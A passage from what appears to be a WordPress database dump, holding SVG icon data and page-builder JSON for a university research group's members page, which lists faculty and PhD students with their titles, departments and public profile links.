158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-09-29 22:15:14','2023-09-30 02:15:14','',182,'https://gsudice.dataconn.net/?p=1618',0,'revision','',0),(1624,1,'2023-09-29 22:24:47','2023-09-30 02:24:47','','anupam','','inherit','open','closed','','anupam','','','2023-09-29 22:24:47','2023-09-30 02:24:47','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg',0,'attachment','image/jpeg',0),(1625,1,'2023-09-29 22:27:09','2023-09-30 02:27:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c60\",\"parentId\":\"182-c59\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c59\",\"parentId\":\"182-c58\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c58\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c63\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c64\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c63\",\"index\":2,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c63\",\"index\":3,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c63\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c79\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c189\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c189\",\"index\":0,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c189\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c189\",\"index\":2,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c189\",\"index\":3,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 